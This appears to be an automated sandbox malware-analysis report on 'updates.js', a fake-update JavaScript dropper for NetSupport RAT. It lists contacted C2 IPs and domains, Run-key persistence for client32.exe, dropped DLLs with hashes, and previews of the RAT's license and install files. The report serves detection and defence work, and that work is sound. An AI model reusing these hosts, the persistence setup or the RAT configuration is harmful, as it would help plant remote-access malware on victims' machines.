                                    https://yandex.com/safety/?frombrowser=yes&url=$3powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://yandex.com/safety/?frombrowser=yes&url=$2powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/variableCompositeOperationwscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/ecomfe/zrender/blob/master/LICENSE.txtwscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://oneget.orgpowershell.exe, 00000001.00000002.1816720389.00000170BBE9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://yandex.com/support/browser/security/protection.htmlpowershell.exe, 00000001.00000002.1816720389.00000170BB0F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    94.158.245.103
                                    		unknownMoldova Republic of
                                    		39798MIVOCLOUDMDfalse
                                    23.227.193.59
                                    		dfwreds.comUnited States
                                    		29802HVC-ASUStrue
                                    104.26.0.231
                                    		geo.netsupportsoftware.comUnited States
                                    		13335CLOUDFLARENETUSfalse

                                    General Information

                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1474469
                                    Start date and time:2024-07-16 22:28:51 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 42s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:10
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:updates.js
                                    Detection:MAL
                                    Classification:mal100.rans.troj.expl.evad.winJS@8/28@3/3
                                    EGA Information:
                                    • Successful, ratio: 66.7%
                                    HCA Information:
                                    • Successful, ratio: 74%
                                    • Number of executed functions: 134
                                    • Number of non-executed functions: 234
                                    Cookbook Comments:
                                    • Found application associated with file extension: .js

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 7424 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: updates.js

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    16:29:46API Interceptor42x Sleep call for process: powershell.exe modified
                                    16:30:24API Interceptor5910610x Sleep call for process: client32.exe modified
                                    21:29:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HQWQTO C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                    21:30:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run HQWQTO C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    94.158.245.103Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • http://94.158.245.103/fakeurl.htm
                                    updates.jsGet hashmaliciousNetSupport RATBrowse
                                    • http://94.158.245.103/fakeurl.htm
                                    Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • http://94.158.245.103/fakeurl.htm
                                    23.227.193.59Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • dfwreds.com/data.php?6961
                                    http://beetrootculture.comGet hashmaliciousUnknownBrowse
                                    • beetrootculture.com/favicon.ico
                                    http://beetrootculture.comGet hashmaliciousUnknownBrowse
                                    • beetrootculture.com/favicon.ico
                                    104.26.0.231updates.jsGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    q8m0iSxPqZ.exeGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    q8m0iSxPqZ.exeGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    Update_124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    VtZtwUsgtrnEnlkxHy.ps1Get hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    SecureClientInstaller.exeGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    IN___T9ZEKNFSIJ.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    IN___ODZ4JE3VG1.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    11068-1106811068-11068.lnkGet hashmaliciousNetSupport RAT, NetSupport Downloader, MalLnkBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    geo.netsupportsoftware.comUpdate 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.1.231
                                    updates.jsGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    17851032425.zipGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.1.231
                                    q8m0iSxPqZ.exeGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    q8m0iSxPqZ.exeGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.1.231
                                    file.exeGet hashmaliciousNetSupport RAT, LummaC Stealer, NetSupport DownloaderBrowse
                                    • 172.67.68.212
                                    SAPConcur.msixGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.1.231
                                    MDE_File_Sample_fb7baecc9f46e01492b4e3e6409d6c73f83a1169.zipGet hashmaliciousNetSupport RATBrowse
                                    • 172.67.68.212
                                    Update_124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    dfwreds.comUpdate 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • 23.227.193.59

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    MIVOCLOUDMDUpdate 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • 94.158.245.103
                                    yvM2XCEkGj.exeGet hashmaliciousRaccoon Stealer v2Browse
                                    • 5.181.159.42
                                    updates.jsGet hashmaliciousNetSupport RATBrowse
                                    • 94.158.245.103
                                    xUtQLCJLoN.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 94.158.244.72
                                    GsPg7N8T6N.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 94.158.244.72
                                    ZNxa7TSWl4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 94.158.244.72
                                    fj5cuMFGnv.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 94.158.244.72
                                    J33Y3d3zTW.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 94.158.244.72
                                    0ilcDpXPQz.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 94.158.244.72
                                    fJky6Kh6w1.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 94.158.244.72
                                    HVC-ASUSUpdate 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • 23.227.193.59
                                    Setup.exeGet hashmaliciousAsyncRAT, HTMLPhisher, Clipboard Hijacker, Phorpiex, PureLog Stealer, Raccoon Stealer v2, RedLineBrowse
                                    • 23.227.193.59
                                    SecuriteInfo.com.Program.Unwanted.2818.3154.4230.exeGet hashmaliciousPetite VirusBrowse
                                    • 46.21.150.242
                                    DHL119040 receipt document,pdf.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • 23.227.203.18
                                    502407267 RUAG FOODPLAZA.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                    • 23.111.142.162
                                    http://beetrootculture.comGet hashmaliciousUnknownBrowse
                                    • 23.227.193.59
                                    hANEXOPDF.PDF40 234057.msiGet hashmaliciousUnknownBrowse
                                    • 23.111.168.85
                                    http://beetrootculture.comGet hashmaliciousUnknownBrowse
                                    • 23.227.193.59
                                    Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeGet hashmaliciousFormBookBrowse
                                    • 23.111.180.146
                                    Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                                    • 23.111.180.146
                                    CLOUDFLARENETUShttps://rzp.io/i/xy1F341vGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    https://s3.us-east-2.amazonaws.com/vanproteaactiomfaautomattification/crosoftfaactiomfaautomattification.html?uaid=is0f7fb0456e=5%3aLPSRYI&at=9&xsdata=MDV8MDJ8YW5nZWxAZm91cnN0YXJkcnl3YWxsLmNvbXxkN2QwMmI4ZmMyOTM0MzkzMTE1MzA4ZGM5YWYzMzBjZXw1N2Q4Mzc1NTQyNjc0MjZjODNkMGRkYTgxZjRkNDM5MXwxfDBGet hashmaliciousUnknownBrowse
                                    • 172.66.47.90
                                    http://links.888brands.net/ctt?m=34615482&r=LTg2NDEhwtlzNjA1MDIS1&b=0&j=MjUyMjI0NDU0OAS2&mt=1&kt=12&kx=1&k=888-external-en_custhelp_com_a&kd=//brandequity.economictimes.indiatimes.com/etl.php?url=petradarclub.com.br/dayo/i4hp2/captcha/d2FkZS5tb3JyaXNvbkBncm9zcy13ZW4uY29tGet hashmaliciousHTMLPhisherBrowse
                                    • 172.67.167.161
                                    https://sup3300.org/Get hashmaliciousUnknownBrowse
                                    • 104.17.25.14
                                    https://acrobat.adobe.com/id/urn:aaid:sc:eu:ee698a8c-0f5f-4d49-8e57-941bebba7ea3Get hashmaliciousHTMLPhisherBrowse
                                    • 104.18.11.207
                                    https://s3.us-east-2.amazonaws.com/vanproteaactiomfaautomattification/crosoftfaactiomfaautomattification.html?uaid=is0f7fb0456e=5%3aLPSRYI&at=9&xsdata=MDV8MDJ8YW5nZWxAZm91cnN0YXJkcnl3YWxsLmNvbXxkN2QwMmI4ZmMyOTM0MzkzMTE1MzA4ZGM5YWYzMzBjZXw1N2Q4Mzc1NTQyNjc0MjZjODNkMGRkYTgxZjRkNDM5MXwxfDBGet hashmaliciousUnknownBrowse
                                    • 172.66.47.90
                                    http://webnovelpub.pro/Get hashmaliciousUnknownBrowse
                                    • 104.21.11.245
                                    https://s3.us-east-2.amazonaws.com/vanproteaactiomfaautomattification/crosoftfaactiomfaautomattification.html?uaid=is0f7fb0456e=5%3aLPSRYI&at=9&xsdata=MDV8MDJ8YW5nZWxAZm91cnN0YXJkcnl3YWxsLmNvbXxkN2QwMmI4ZmMyOTM0MzkzMTE1MzA4ZGM5YWYzMzBjZXw1N2Q4Mzc1NTQyNjc0MjZjODNkMGRkYTgxZjRkNDM5MXwxfDBGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    VM-Transcript Caller Left (2) CALLMSG (000049Secs) ofsoptics.com Te.... (15.5 KB).msgGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                    • 104.17.25.14
                                    https __fxb.opgandi.com_F7kw_.htmlGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLLUpdate 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                      updates.jsGet hashmaliciousNetSupport RATBrowse
                                        Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                          Update_124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                            MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zipGet hashmaliciousNetSupport RATBrowse
                                              update.jsGet hashmaliciousNetSupport RATBrowse
                                                Update_122.0.616.jsGet hashmaliciousNetSupport RATBrowse
                                                  BILL93607.jsGet hashmaliciousNetSupport RATBrowse
                                                    http://gg.gg/carzzz#fyGet hashmaliciousNetSupport RATBrowse
                                                      update.jsGet hashmaliciousNetSupport RATBrowse
                                                        C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLLUpdate 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                          updates.jsGet hashmaliciousNetSupport RATBrowse
                                                            Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                              Update_124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zipGet hashmaliciousNetSupport RATBrowse
                                                                  update.jsGet hashmaliciousNetSupport RATBrowse
                                                                    Update_122.0.616.jsGet hashmaliciousNetSupport RATBrowse
                                                                      BILL93607.jsGet hashmaliciousNetSupport RATBrowse
                                                                        http://gg.gg/carzzz#fyGet hashmaliciousNetSupport RATBrowse
                                                                          update.jsGet hashmaliciousNetSupport RATBrowse

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loca[1].htm

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:modified
                                                                            Size (bytes):16
                                                                            Entropy (8bit):3.077819531114783
                                                                            Encrypted:false
                                                                            SSDEEP:3:llD:b
                                                                            MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                            SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                            SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                            SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:40.7357,-74.1724

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1524
                                                                            Entropy (8bit):5.3904027322805375
                                                                            Encrypted:false
                                                                            SSDEEP:24:31Nn4SKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKmNmwr8HJYBlD3RB+j:FNn4SU4y4RQmFoUeCamfm9qr9tK8Nfm3
                                                                            MD5:652454284F90BD3744B5DC8A572B5080
                                                                            SHA1:AC04F05E3935F1F95EB90EE1D54A6B4BD27EDCDC
                                                                            SHA-256:12BD82D57AF13593F725DB195F03331C5667C1280EAF76DC1642E20C53AD260E
                                                                            SHA-512:98656D2368850A9F4B690D69FFACF412B0D38AFFEDF9DC25CECF653BDE2232725F5276FF340CD0C9AD95EE349776A2E86FE5C4EB4F70EC651718B7CBC9761E35
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:@...e...........8.....................&..............@..........H...............x..}...@..."~.u....... .System.IO.Compression.FileSystemH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Ut

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dfxu2od.ja4.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olj24nsh.di3.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLL

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):328056
                                                                            Entropy (8bit):6.7547459359511395
                                                                            Encrypted:false
                                                                            SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                            MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                            SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                            SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                            SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                            Joe Sandbox View:
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: Update_124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            • Filename: Update_122.0.616.js, Detection: malicious, Browse
                                                                            • Filename: BILL93607.js, Detection: malicious, Browse
                                                                            • Filename: , Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\NSM.LIC

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):195
                                                                            Entropy (8bit):4.924914741174998
                                                                            Encrypted:false
                                                                            SSDEEP:6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
                                                                            MD5:E9609072DE9C29DC1963BE208948BA44
                                                                            SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                                                                            SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                                                                            SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                                                                            Malicious:true
                                                                            Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\NSM.ini

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Generic INItialization configuration [Features]
                                                                            Category:dropped
                                                                            Size (bytes):6458
                                                                            Entropy (8bit):4.645519507940197
                                                                            Encrypted:false
                                                                            SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                            MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                            SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                            SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                            SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                            Malicious:false
                                                                            Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLL

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):18808
                                                                            Entropy (8bit):6.292094060787929
                                                                            Encrypted:false
                                                                            SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                            MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                            SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                            SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                            SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                            Joe Sandbox View:
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: Update_124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            • Filename: Update_122.0.616.js, Detection: malicious, Browse
                                                                            • Filename: BILL93607.js, Detection: malicious, Browse
                                                                            • Filename: , Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICL32.DLL

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3740024
                                                                            Entropy (8bit):6.527276298837004
                                                                            Encrypted:false
                                                                            SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                            MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                            SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                            SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                            SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICL32.DLL, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 6%
